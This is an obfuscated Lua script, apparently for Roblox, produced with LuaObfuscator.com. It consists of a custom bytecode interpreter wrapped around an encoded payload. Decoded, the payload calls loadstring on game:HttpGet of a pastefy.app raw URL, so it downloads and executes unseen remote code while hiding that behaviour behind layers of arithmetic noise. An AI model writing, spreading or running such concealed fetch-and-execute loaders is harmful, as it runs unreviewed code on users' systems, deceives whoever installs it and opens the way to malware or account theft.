--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=v2(v0(v30,16));if v19 then local v116=v5(v87,v19);v19=nil;return v116;else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(1 + 0))) + (2 -1))) ;return v88-(v88%((98 + 522) -(555 + 64))) ;else local v89=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v89 + v89))>=v89) and ((1805 -(282 + 595)) -(214 + 713))) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1637 -(1523 + 114) ;local v36;local v37;while true do if (v35==1) then return (v37 * (231 + 25)) + v36 ;end if (v35==((957 -(892 + 65)) -0)) then v36,v37=v1(v16,v18,v18 + ((2544 -1477) -(68 + 997)) );v18=v18 + ((2350 -1078) -(226 + 1044)) ;v35=1 + (0 -0) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + ((731 -547) -(67 + 113)) ;return (v41 * (12302277 + 4474939)) + (v40 * (160901 -95365)) + (v39 * (189 + 67)) + v38 ;end local function v24() local v42=952 -(802 + 150) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==1) then v45=2 -(1 + 0) ;v46=(v20(v44,1 -(772 -(201 + 571)) ,15 + 5 ) * ((999 -(915 + 82))^(90 -58))) + v43 ;v42=2 + 0 ;end if (v42==(2 -0)) then v47=v20(v44,1208 -(1069 + 118) ,31);v48=((v20(v44,72 -40 )==(1139 -(116 + 1022))) and  -(1 -0)) or (1 + 0) ;v42=4 -1 ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=792 -(368 + (1760 -1337)) ;end if (v42==(9 -6)) then if (v47==(18 -(10 + 8))) then if (v46==(0 -0)) then return v48 * ((260 + 182) -(416 + 26)) ;else v47=1;v45=0 -0 ;end elseif (v47==(879 + 1168)) then return ((v46==0) and (v48 * (((3 -2) -0)/(438 -((514 -369) + (1152 -(814 + 45))))))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^(17 + 35)))) ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v68=1 + 0 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 374 -(123 + 251) ;end)();local v91=(function() return;end)();local v93=(function() return;end)();while true do if (v90~=(0 -0)) then else local v121=(function() return 0;end)();local v122=(function() return;end)();while true do if (v121~=(1665 -(970 + 695))) then else v122=(function() return 0;end)();while true do if (v122==(0 -0)) then v91=(function() return v92();end)();v93=(function() return nil;end)();v122=(function() return 699 -(208 + 490) ;end)();end if ((1991 -(582 + 1408))~=v122) then else v90=(function() return  #"\\";end)();break;end end break;end end end if (v90== #"\\") then if (v91== #"!") then v93=(function() return v92()~=(0 + 0) ;end)();elseif (v91==2) then v93=(function() return v94();end)();elseif (v91~= #"xxx") then else v93=(function() return v95();end)();end v96[v97]=(function() return v93;end)();break;end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v53=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 0 + 0 ;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do local v115=(function() return 836 -(660 + 176) ;end)();while true do if (v115~=0) then else if (v107==(1 + 0)) then while true do if (0~=v98) then else v99=(function() return v100();end)();if (v101(v99, #"~", #"}")~=(202 -(14 + 188))) then else local v129=(function() return 0 -0 ;end)();local v130=(function() return;end)();local v131=(function() return;end)();local v132=(function() return;end)();while true do if (v129==(11 -8)) then if (v101(v131, #"19(", #"19(")== #",") then v132[ #"xnxx"]=(function() return v104[v132[ #"http"]];end)();end v105[v106]=(function() return v132;end)();break;end if (2==v129) then if (v101(v131, #"}", #"}")~= #"{") then else v132[1826 -(1195 + 629) ]=(function() return v104[v132[2 -0 ]];end)();end if (v101(v131,677 -(534 + 141) ,1 + 1 )== #"}") then v132[ #"xxx"]=(function() return v104[v132[ #"xnx"]];end)();end v129=(function() return 244 -(187 + 54) ;end)();end if (v129~=(781 -(162 + 618))) then else local v170=(function() return 0 + 0 ;end)();while true do if (1==v170) then v129=(function() return 2 + 0 ;end)();break;end if (v170~=(0 -0)) then else v132=(function() return {v102(),v102(),nil,nil};end)();if (v130==(0 + 0)) then local v182=(function() return 0 -0 ;end)();local v183=(function() return;end)();while true do if (v182==0) then v183=(function() return 0;end)();while true do if ((0 -0)==v183) then v132[ #"-19"]=(function() return v102();end)();v132[ #".dev"]=(function() return v102();end)();break;end end break;end end elseif (v130== #"[") then v132[ #"xxx"]=(function() return v103();end)();elseif (v130==(5 -3)) then v132[ #"91("]=(function() return v103() -(2^(9 + 7)) ;end)();elseif (v130~= #"19(") then else local v188=(function() return 0;end)();local v189=(function() return;end)();while true do if (v188==(0 + 0)) then v189=(function() return 0;end)();while true do if (v189~=(1000 -(451 + 549))) then else v132[ #"xxx"]=(function() return v103() -(2^(6 + 10)) ;end)();v132[ #"xnxx"]=(function() return v102();end)();break;end end break;end end end v170=(function() return 1 -0 ;end)();end end end if (v129==(0 -0)) then v130=(function() return v101(v99,398 -(115 + 281) , #"asd");end)();v131=(function() return v101(v99, #".com",13 -7 );end)();v129=(function() return 1 + 0 ;end)();end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end if (v107==0) then local v126=(function() return 0 + 0 ;end)();while true do if (v126==(341 -(218 + 123))) then v98=(function() return 0 -0 ;end)();v99=(function() return nil;end)();v126=(function() return 3 -2 ;end)();end if (v126~=(868 -(550 + 317))) then else v107=(function() return 561 -(306 + 254) ;end)();break;end end end break;end end end end;end)();local v54=(function() return function(v108,v109,v110) local v111=(function() return 0 -0 ;end)();local v112=(function() return;end)();while true do if (v111==(0 -0)) then v112=(function() return 0 -0 ;end)();while true do if (v112==(1467 -(899 + 568))) then local v127=(function() return 0 + 0 ;end)();while true do if (v127~=0) then else v108[v109-#"}" ]=(function() return v110();end)();return v108,v109,v110;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #"|",v59 do FlatIdent_39B0,Type,v21,Cons,v24,v25,v60,v70=(function() return v52(FlatIdent_39B0,Type,v21,Cons,v24,v25,v60,v70);end)();end v58[ #"gha"]=(function() return v21();end)();for v71= #" ",v23() do FlatIdent_61585,Descriptor,v21,v20,v22,v23,v60,v55,v71=(function() return v53(FlatIdent_61585,Descriptor,v21,v20,v22,v23,v60,v55,v71);end)();end for v72= #"|",v23() do v56,v72,v28=(function() return v54(v56,v72,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[(137 + 467) -(268 + 335) ];local v66=v62[292 -(60 + 230) ];local v67=v62[3];return function(...) local v73=v65;local v74=v66;local v75=v67;local v76=v27;local v77=573 -(426 + 146) ;local v78= -(1 + 0);local v79={};local v80={...};local v81=v12("#",...) -(812 -(569 + 242)) ;local v82={};local v83={};for v113=0 -0 ,v81 do if ((1432<3555) and (v113>=v75)) then v79[v113-v75 ]=v80[v113 + 1 + 0 ];else v83[v113]=v80[v113 + 1 ];end end local v84=(v81-v75) + 1 ;local v85;local v86;while true do local v114=1024 -(706 + 318) ;while true do if (v114==(1251 -(721 + 530))) then v85=v73[v77];v86=v85[(1685 -(15 + 398)) -(945 + 326) ];v114=2 -1 ;end if (v114==(1 + (982 -(18 + 964)))) then if ((v86<=(707 -(271 + (1614 -1185)))) or (1065>3578)) then if (v86<=(2 + 1 + 0)) then if (v86<=(1501 -(1408 + 92))) then if (v86>((685 + 401) -(461 + 625))) then local v133=1288 -(993 + (1145 -(20 + 830))) ;local v134;local v135;local v136;local v137;while true do if (v133==(1 + 0)) then v78=(v136 + v134) -1 ;v137=0 + 0 ;v133=2;end if ((0==v133) or (4795<1407)) then v134=v85[1173 -(418 + 753) ];v135,v136=v76(v83[v134](v13(v83,v134 + 1 + 0 ,v85[3])));v133=1;end if (v133==(1 + 1)) then for v176=v134,v78 do v137=v137 + 1 + 0 ;v83[v176]=v135[v137];end break;end end else local v138=v85[2];local v139=v83[v85[1 + 2 ]];v83[v138 + (530 -(406 + 123)) ]=v139;v83[v138]=v139[v85[130 -(116 + 10) ]];end elseif (v86==(1771 -(1749 + 20))) then local v143=v85[1 + 1 ];local v144=v83[v85[1325 -(1249 + 73) ]];v83[v143 + 1 + 0 ]=v144;v83[v143]=v144[v85[1149 -(466 + 51 + 628) ]];else v83[v85[4 -2 ]]=v64[v85[8 -5 ]];end elseif (v86<=(1905 -((844 -(542 + 196)) + (3845 -2051)))) then if (v86==(2 + 2)) then v83[v85[2]]();else local v150=0 + 0 ;local v151;while true do if ((1853<4813) and (v150==((0 + 0) -0))) then v151=v85[5 -3 ];v83[v151]=v83[v151](v13(v83,v151 + 1 ,v78));break;end end end elseif ((v86>(120 -(4 + 110))) or (2821<2431)) then local v152=v85[2];local v153,v154=v76(v83[v152](v13(v83,v152 + (585 -(29 + 28 + 190 + 337)) ,v85[1430 -(41 + 1386) ])));v78=(v154 + v152) -(104 -(17 + 86)) ;local v155=0 + 0 ;for v166=v152,v78 do v155=v155 + (1 -0) ;v83[v166]=v153[v155];end else v83[v85[5 -3 ]]=v85[169 -((321 -199) + (112 -68)) ];end elseif ((v86<=11) or (2874<2181)) then if (v86<=9) then if (v86>(13 -5)) then local v158=0 -0 ;local v159;while true do if (v158==(0 + 0)) then v159=v85[1 + 1 ];v83[v159]=v83[v159](v13(v83,v159 + (1 -0) ,v78));break;end end else do return;end end elseif ((v86>(75 -(30 + 35))) or (2689<=343)) then v83[v85[2 + 0 ]]=v64[v85[1260 -(1043 + 214) ]];else v83[v85[7 -5 ]]=v85[3];end elseif (v86<=(1225 -(323 + 889))) then if (v86==12) then v83[v85[5 -3 ]]={};else v83[v85[(2133 -(1126 + 425)) -(361 + 219) ]]={};end elseif ((v86>(334 -(53 + 267))) or (1869==2009)) then do return;end else v83[v85[2]]();end v77=v77 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F64684C6C357634682F72617700094Q000D7Q001203000100013Q001203000200023Q00202Q00020002000300120A000400044Q0001000200044Q000900013Q00022Q00040001000100012Q00083Q00017Q00",v9(),...);
